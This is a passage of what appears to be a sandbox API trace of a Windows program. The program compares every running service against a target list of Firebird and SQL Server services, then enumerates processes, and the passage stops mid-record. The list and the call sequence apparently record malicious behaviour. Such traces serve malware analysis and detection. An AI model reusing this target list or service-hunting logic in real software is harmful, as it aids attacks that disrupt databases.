(lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0222.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0222.191] lstrlenW (lpString="BFE") returned 3 [0222.191] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0222.191] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0222.191] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0222.191] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0222.191] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0222.191] lstrlenW (lpString="BITS") returned 4 [0222.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0222.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0222.192] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0222.192] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0222.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0222.192] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0222.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0222.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0222.192] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0222.192] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0222.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0222.192] lstrlenW (lpString="CDPSvc") returned 6 [0222.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0222.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0222.192] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0222.192] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0222.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0222.192] lstrlenW (lpString="ClickToRunSvc") returned 13 [0222.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0222.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0222.192] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0222.192] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0222.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0222.192] lstrlenW (lpString="ClipSVC") returned 7 [0222.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0222.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0222.192] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0222.192] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0222.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0222.192] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0222.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0222.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0222.192] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0222.192] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0222.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0222.192] lstrlenW (lpString="CryptSvc") returned 8 [0222.192] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0222.192] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0222.192] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0222.192] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0222.192] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0222.193] lstrlenW (lpString="DcomLaunch") returned 10 [0222.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0222.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0222.193] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0222.193] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0222.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0222.193] lstrlenW (lpString="DeviceAssociationService") returned 24 [0222.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0222.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0222.193] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0222.193] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0222.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0222.193] lstrlenW (lpString="Dhcp") returned 4 [0222.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0222.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0222.193] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0222.193] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0222.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0222.193] lstrlenW (lpString="Dnscache") returned 8 [0222.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0222.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0222.193] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0222.193] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0222.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0222.193] lstrlenW (lpString="DoSvc") returned 5 [0222.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0222.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0222.193] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0222.193] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0222.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0222.193] lstrlenW (lpString="DPS") returned 3 [0222.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0222.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0222.193] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0222.193] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0222.193] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0222.193] lstrlenW (lpString="DusmSvc") returned 7 [0222.193] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0222.193] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0222.193] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0222.194] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0222.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0222.194] lstrlenW (lpString="EventLog") returned 8 [0222.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0222.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0222.194] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0222.194] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0222.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0222.194] lstrlenW (lpString="EventSystem") returned 11 [0222.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0222.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0222.194] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0222.194] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0222.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0222.194] lstrlenW (lpString="FontCache") returned 9 [0222.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0222.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0222.194] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0222.194] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0222.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0222.194] lstrlenW (lpString="gpsvc") returned 5 [0222.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0222.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0222.194] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0222.194] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0222.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0222.194] lstrlenW (lpString="iphlpsvc") returned 8 [0222.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0222.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0222.194] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0222.194] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0222.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0222.194] lstrlenW (lpString="KeyIso") returned 6 [0222.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0222.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0222.194] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0222.194] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0222.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0222.194] lstrlenW (lpString="LanmanServer") returned 12 [0222.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0222.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0222.195] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0222.195] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0222.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0222.195] lstrlenW (lpString="LanmanWorkstation") returned 17 [0222.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0222.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0222.195] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0222.195] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0222.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0222.195] lstrlenW (lpString="lfsvc") returned 5 [0222.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0222.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0222.195] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0222.195] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0222.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0222.195] lstrlenW (lpString="LicenseManager") returned 14 [0222.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0222.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0222.195] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0222.195] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0222.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0222.195] lstrlenW (lpString="lmhosts") returned 7 [0222.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0222.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0222.195] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0222.195] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0222.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0222.195] lstrlenW (lpString="LSM") returned 3 [0222.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0222.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0222.195] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0222.195] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0222.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0222.196] lstrlenW (lpString="MpsSvc") returned 6 [0222.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0222.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0222.196] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0222.196] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0222.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0222.196] lstrlenW (lpString="NcbService") returned 10 [0222.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0222.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0222.196] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0222.196] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0222.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0222.196] lstrlenW (lpString="netprofm") returned 8 [0222.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0222.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0222.196] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0222.196] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0222.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0222.196] lstrlenW (lpString="NlaSvc") returned 6 [0222.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0222.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0222.196] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0222.196] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0222.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0222.196] lstrlenW (lpString="nsi") returned 3 [0222.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0222.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0222.196] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0222.196] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0222.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0222.196] lstrlenW (lpString="PcaSvc") returned 6 [0222.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0222.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0222.196] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0222.196] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0222.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0222.197] lstrlenW (lpString="PlugPlay") returned 8 [0222.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0222.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0222.197] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0222.197] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0222.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0222.197] lstrlenW (lpString="Power") returned 5 [0222.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0222.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0222.197] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0222.197] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0222.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0222.197] lstrlenW (lpString="ProfSvc") returned 7 [0222.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0222.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0222.197] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0222.197] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0222.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0222.197] lstrlenW (lpString="RpcEptMapper") returned 12 [0222.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0222.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0222.197] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0222.197] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0222.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0222.197] lstrlenW (lpString="RpcSs") returned 5 [0222.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0222.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0222.197] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0222.197] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0222.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0222.197] lstrlenW (lpString="SamSs") returned 5 [0222.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0222.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0222.197] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0222.197] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0222.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0222.197] lstrlenW (lpString="Schedule") returned 8 [0222.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0222.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0222.198] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0222.198] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0222.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0222.198] lstrlenW (lpString="SecurityHealthService") returned 21 [0222.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0222.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0222.198] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0222.198] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0222.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0222.198] lstrlenW (lpString="SENS") returned 4 [0222.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0222.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0222.198] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0222.198] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0222.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0222.198] lstrlenW (lpString="ShellHWDetection") returned 16 [0222.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0222.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0222.198] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0222.198] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0222.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0222.198] lstrlenW (lpString="Spooler") returned 7 [0222.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0222.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0222.198] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0222.198] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0222.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0222.198] lstrlenW (lpString="sppsvc") returned 6 [0222.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0222.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0222.198] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0222.198] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0222.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0222.198] lstrlenW (lpString="SSDPSRV") returned 7 [0222.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0222.199] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0222.199] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0222.199] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0222.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x430 [0222.203] Process32FirstW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.203] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0222.204] lstrlenW (lpString="System") returned 6 [0222.204] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0222.205] lstrlenW (lpString="smss.exe") returned 8 [0222.205] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.206] lstrlenW (lpString="csrss.exe") returned 9 [0222.206] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0222.207] lstrlenW (lpString="wininit.exe") returned 11 [0222.207] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0222.207] lstrlenW (lpString="csrss.exe") returned 9 [0222.207] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0222.208] lstrlenW (lpString="winlogon.exe") returned 12 [0222.208] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0222.209] lstrlenW (lpString="services.exe") returned 12 [0222.209] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0222.210] lstrlenW (lpString="lsass.exe") returned 9 [0222.210] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.210] lstrlenW (lpString="svchost.exe") returned 11 [0222.210] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0222.211] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0222.211] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0222.212] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0222.212] Process32NextW (in: hSnapshot=0x430, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, 